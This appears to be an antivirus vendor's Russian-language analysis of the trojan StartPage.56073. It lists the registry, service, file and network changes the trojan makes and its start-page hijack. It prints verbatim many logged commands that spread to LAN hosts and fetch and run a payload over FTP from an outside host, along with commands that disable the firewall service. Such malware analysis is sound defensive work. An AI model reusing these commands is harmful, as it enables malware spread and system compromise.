Trojan.StartPage.56073

Техническая информация

Для обеспечения автозапуска и распространения:

Модифицирует следующие ключи реестра:

[<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] 'Shell' = 'Explorer.exe'
[<HKLM>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 'safe360' = '%CommonProgramFiles%\sfbsbvy\coiome.exe'

Создает или изменяет следующие файлы:

%WINDIR%\Tasks\RUV5.exe
%WINDIR%\Tasks\RUVu.vbe

Создает следующие сервисы:

[<HKLM>\SYSTEM\ControlSet001\Services\LmHosts] 'Start' = '00000002'
[<HKLM>\SYSTEM\ControlSet001\Services\RpcLocator] 'Start' = '00000002'
[<HKLM>\SYSTEM\ControlSet001\Services\NtLmSsp] 'Start' = '00000002'
[<HKLM>\SYSTEM\ControlSet001\Services\Browser] 'Start' = '00000002'
[<HKLM>\SYSTEM\ControlSet001\Services\lanmanserver] 'Start' = '00000002'
[<HKLM>\SYSTEM\ControlSet001\Services\lanmanworkstation] 'Start' = '00000002'

Вредоносные функции:

Создает и запускает на исполнение:

'%WINDIR%\Tasks\RUV5.exe' 10.0.0.30 :
'%WINDIR%\Tasks\RUV5.exe' 10.0.0.31 :
'%WINDIR%\Tasks\RUV5.exe' 10.0.0.32 :
'%WINDIR%\Tasks\RUV5.exe' 10.0.0.29 :
'%WINDIR%\Tasks\RUV5.exe' 10.0.0.26 :
'%WINDIR%\Tasks\RUV5.exe' 10.0.0.27 :
'%WINDIR%\Tasks\RUV5.exe' 10.0.0.28 :
'%WINDIR%\Tasks\RUV5.exe' 10.0.0.39 :
'%WINDIR%\Tasks\RUV5.exe' 10.0.0.40 :
'%WINDIR%\Tasks\RUV5.exe' 10.0.0.41 :
'%WINDIR%\Tasks\RUV5.exe' 10.0.0.37 :
'%WINDIR%\Tasks\RUV5.exe' 10.0.0.33 :
'%WINDIR%\Tasks\RUV5.exe' 10.0.0.35 :
'%WINDIR%\Tasks\RUV5.exe' 10.0.0.36 :
'%WINDIR%\Tasks\RUV5.exe' 10.0.0.6 :
'%WINDIR%\Tasks\RUV5.exe' 10.0.0.10 :
'%WINDIR%\Tasks\RUV5.exe' 10.0.0.11 :
'%WINDIR%\Tasks\RUV5.exe' 10.0.0.4 :
'%CommonProgramFiles%\sfbsbvy\coiome.exe'
'%WINDIR%\Tasks\RUV5.exe' 10.0.0.2 :
'%WINDIR%\Tasks\RUV5.exe' 10.0.0.1 :
'%WINDIR%\Tasks\RUV5.exe' 10.0.0.16 :
'%WINDIR%\Tasks\RUV5.exe' 10.0.0.17 :
'%WINDIR%\Tasks\RUV5.exe' 10.0.0.25 :
'%WINDIR%\Tasks\RUV5.exe' 10.0.0.15 :
'%WINDIR%\Tasks\RUV5.exe' 10.0.0.12 :
'%WINDIR%\Tasks\RUV5.exe' 10.0.0.13 :
'%WINDIR%\Tasks\RUV5.exe' 10.0.0.14 :

Запускает на исполнение:

'<SYSTEM32>\cscript.exe' %WINDIR%\Tasks\RUVu.vbe 10.0.0.16 %USERNAME% "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by>>b.dat&@ftp -s:b.dat&del b.dat&z.exe&z.exe&del z.exe"
'<SYSTEM32>\cscript.exe' %WINDIR%\Tasks\RUVu.vbe 10.0.0.13 %USERNAME% "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by>>b.dat&@ftp -s:b.dat&del b.dat&z.exe&z.exe&del z.exe"
'<SYSTEM32>\cscript.exe' %WINDIR%\Tasks\RUVu.vbe 10.0.0.18 %USERNAME% "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by>>b.dat&@ftp -s:b.dat&del b.dat&z.exe&z.exe&del z.exe"
'<SYSTEM32>\cscript.exe' %WINDIR%\Tasks\RUVu.vbe 10.0.0.12 %USERNAME% "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by>>b.dat&@ftp -s:b.dat&del b.dat&z.exe&z.exe&del z.exe"
'<SYSTEM32>\cscript.exe' %WINDIR%\Tasks\RUVu.vbe 10.0.0.3 %USERNAME% "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by>>b.dat&@ftp -s:b.dat&del b.dat&z.exe&z.exe&del z.exe"
'<SYSTEM32>\cscript.exe' %WINDIR%\Tasks\RUVu.vbe 10.0.0.1 %USERNAME% "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by>>b.dat&@ftp -s:b.dat&del b.dat&z.exe&z.exe&del z.exe"
'<SYSTEM32>\cscript.exe' %WINDIR%\Tasks\RUVu.vbe 10.0.0.11 %USERNAME% "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by>>b.dat&@ftp -s:b.dat&del b.dat&z.exe&z.exe&del z.exe"
'<SYSTEM32>\cscript.exe' %WINDIR%\Tasks\RUVu.vbe 10.0.0.10 %USERNAME% "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by>>b.dat&@ftp -s:b.dat&del b.dat&z.exe&z.exe&del z.exe"
'<SYSTEM32>\sc.exe' 10.0.0.42 :
'<SYSTEM32>\sc.exe' /pid=3444
'<SYSTEM32>\cscript.exe' /pid=3180
'<SYSTEM32>\net1.exe' /pid=3808
'<SYSTEM32>\cscript.exe' %WINDIR%\Tasks\RUVu.vbe 10.0.0.30 %USERNAME% "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by>>b.dat&@ftp -s:b.dat&del b.dat&z.exe&z.exe&del z.exe"
'<SYSTEM32>\cscript.exe' %WINDIR%\Tasks\RUVu.vbe 10.0.0.26 %USERNAME% "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by>>b.dat&@ftp -s:b.dat&del b.dat&z.exe&z.exe&del z.exe"
'<SYSTEM32>\cscript.exe' %WINDIR%\Tasks\RUVu.vbe 10.0.0.37 %USERNAME% "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by>>b.dat&@ftp -s:b.dat&del b.dat&z.exe&z.exe&del z.exe"
'<SYSTEM32>\taskkill.exe' /c <SYSTEM32>\cscript.exe %WINDIR%\Tasks\RUVu.vbe 10.0.0.37 %USERNAME% "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by>>b.dat&@ftp -s:b.dat&del b.dat&z.exe&z.exe&del z.exe"
'<SYSTEM32>\net1.exe' start RpcLocator
'<SYSTEM32>\sc.exe' config LmHosts start= auto
'<SYSTEM32>\sc.exe' config lanmanworkstation start= auto
'<SYSTEM32>\sc.exe' config NtLmSsp start= auto
'<SYSTEM32>\sc.exe' config RpcLocator start= auto
'<SYSTEM32>\taskkill.exe' /im coiome.exe /f
'<SYSTEM32>\mshta.exe' "%PROGRAM_FILES%\TSV.hta"
'<SYSTEM32>\sc.exe' config lanmanserver start= auto
'<SYSTEM32>\sc.exe' config Browser start= auto
'<SYSTEM32>\net1.exe' stop sharedaccess
'<SYSTEM32>\sc.exe' delete JavaServe
'<SYSTEM32>\net1.exe' start LmHosts
'<SYSTEM32>\taskkill.exe' /im conime.exe /f
'<SYSTEM32>\net1.exe' start lanmanworkstation
'<SYSTEM32>\net1.exe' start lanmanserver
'<SYSTEM32>\attrib.exe' -h -s -r -a "%HOMEPATH%\Cookies\*.*"
'<SYSTEM32>\net1.exe' start Browser

Внедряет код в

следующие системные процессы:

<SYSTEM32>\sc.exe
<SYSTEM32>\taskkill.exe

Без разрешения пользователя устанавливает новую стартовую страницу для Windows Internet Explorer.

Изменения в файловой системе:

Создает следующие файлы:

\Device\LanmanRedirector\10.0.0.15\pipe\browser
\Device\LanmanRedirector\10.0.0.14\pipe\browser
\Device\LanmanRedirector\10.0.0.12\pipe\browser
\Device\LanmanRedirector\10.0.0.27\pipe\browser
\Device\LanmanRedirector\10.0.0.25\pipe\browser
\Device\LanmanRedirector\10.0.0.16\pipe\browser
%HOMEPATH%\Local Settings\Temporary Internet Files\Content.IE5\KHMHGZ4F\b[1].jpg
%CommonProgramFiles%\sfbsbvy\coiome.exe
%PROGRAM_FILES%\TSV.hta
\Device\LanmanRedirector\10.0.0.13\pipe\browser
\Device\LanmanRedirector\10.0.0.11\pipe\browser
%WINDIR%\Fonts\on.ini

Удаляет следующие файлы:

%HOMEPATH%\Local Settings\Temporary Internet Files\Content.IE5\KHMHGZ4F\b[1].jpg
%PROGRAM_FILES%\TSV.hta

Самоудаляется.

Сетевая активность:

Подключается к:

'<IP-адрес в локальной сети>':135
'<IP-адрес в локальной сети>':139
'<IP-адрес в локальной сети>':80
'<IP-адрес в локальной сети>':445
'localhost':1038
'q.###6800.com':80
'tj.##16800.com':80

TCP:

Запросы HTTP GET:

tj.##16800.com/t/Count.asp?ma################################
q.###6800.com/b.jpg

UDP:

DNS ASK 11.#.#.10.in-addr.arpa
DNS ASK 18.#.#.10.in-addr.arpa
DNS ASK 3.#.#.#0.in-addr.arpa
DNS ASK q.###6800.com
DNS ASK tj.##16800.com

Другое:

Ищет следующие окна:

ClassName: 'Shell_TrayWnd' WindowName: '(null)'
ClassName: '(null)' WindowName: '(null)'

Технологии

Термины

Обучение и просвещение

Мифы

Техническая информация

Рекомендации по лечению

Демо бесплатно на 14 дней